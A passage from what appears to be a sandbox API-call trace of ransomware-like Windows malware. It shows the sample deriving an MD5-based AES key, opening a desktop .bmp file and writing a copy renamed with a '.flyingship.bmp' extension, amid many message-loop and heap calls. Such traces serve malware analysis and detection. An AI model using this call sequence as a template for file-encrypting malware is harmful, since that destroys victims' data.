wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.907] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\SEObOseiAS.bmp", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ee78cb0, ftCreationTime.dwHighDateTime=0x1d5d815, ftLastAccessTime.dwLowDateTime=0x3a5f2470, ftLastAccessTime.dwHighDateTime=0x1d5e4f2, ftLastWriteTime.dwLowDateTime=0x3a5f2470, ftLastWriteTime.dwHighDateTime=0x1d5e4f2, nFileSizeHigh=0x0, nFileSizeLow=0x53cf, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="SEObOseiAS.bmp", cAlternateFileName="SEOBOS~1.BMP")) returned 0x90af58 [0164.907] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0164.908] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.908] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0164.908] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0164.908] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0164.908] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0164.908] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0164.908] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0164.908] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0164.908] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0164.908] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0164.908] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0164.908] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0164.908] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0164.908] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0164.908] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0164.908] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0164.909] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0164.909] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c00) returned 1 [0164.910] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0164.910] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0164.910] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0164.910] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0164.910] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0164.910] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0164.910] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0164.910] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0164.910] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0164.910] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0164.910] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0164.910] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0164.910] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.911] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.911] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.911] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0164.911] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.911] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.911] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0164.911] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0164.911] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0164.911] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0164.911] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0164.911] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0164.911] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0164.911] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0164.911] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0164.911] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0164.911] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.911] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.911] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0164.911] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0164.911] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0164.912] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0164.912] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0164.912] CryptCreateHash (in: hProv=0x9c0c00, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0164.912] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.912] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.912] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.912] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.912] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0164.912] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.912] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.912] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0164.912] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0164.912] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0164.912] CryptHashData (hHash=0x90ae18, pbData=0x8dedf8, dwDataLen=0x19, dwFlags=0x1) returned 1 [0164.912] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.912] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.912] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.912] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0164.913] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0164.913] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0164.913] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0164.913] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0164.913] CryptDeriveKey (in: hProv=0x9c0c00, Algid=0x660e, hBaseData=0x90ae18, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90aed8) returned 1 [0164.913] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.913] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.913] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.913] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.913] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.913] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0164.913] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0164.913] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0164.913] CryptDestroyHash (hHash=0x90ae18) returned 1 [0164.913] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.913] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.913] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.913] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.913] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.915] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\SEObOseiAS.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\na3pecvaltbr8vlk\\seoboseias.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0164.915] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0164.915] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0164.915] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0164.915] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0164.915] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0164.915] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0164.915] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0164.915] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0164.915] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0164.916] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0164.916] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0164.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0164.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0164.916] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0164.916] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0164.916] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0164.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0164.916] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.916] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0164.916] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0164.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0164.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0164.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0164.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0164.917] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0164.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0164.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0164.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0164.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0164.917] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0164.917] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0164.917] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0164.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0164.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0164.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0164.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0164.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0164.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0164.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0164.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0164.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0164.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0164.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0164.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0164.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0164.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0164.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0164.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb0) returned 0x8e6cd8 [0164.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0164.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0164.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0164.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x8fecd8 [0164.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6cd8 | out: hHeap=0x8a0000) returned 1 [0164.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0164.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0164.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0164.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0164.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0164.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0164.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0164.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0164.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0164.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0164.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0164.919] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\na3pecvaltbr8vlk")) returned 0x10 [0164.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0164.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0164.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fecd8 | out: hHeap=0x8a0000) returned 1 [0164.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0164.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0164.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0164.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0164.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0x9d5188 [0164.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0164.919] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0164.919] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\SEObOseiAS.flyingship.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\na3pecvaltbr8vlk\\seoboseias.flyingship.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0164.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0164.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0164.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0164.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0164.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0164.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0164.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0164.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0164.922] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0164.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0164.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0164.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0164.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0164.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0164.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 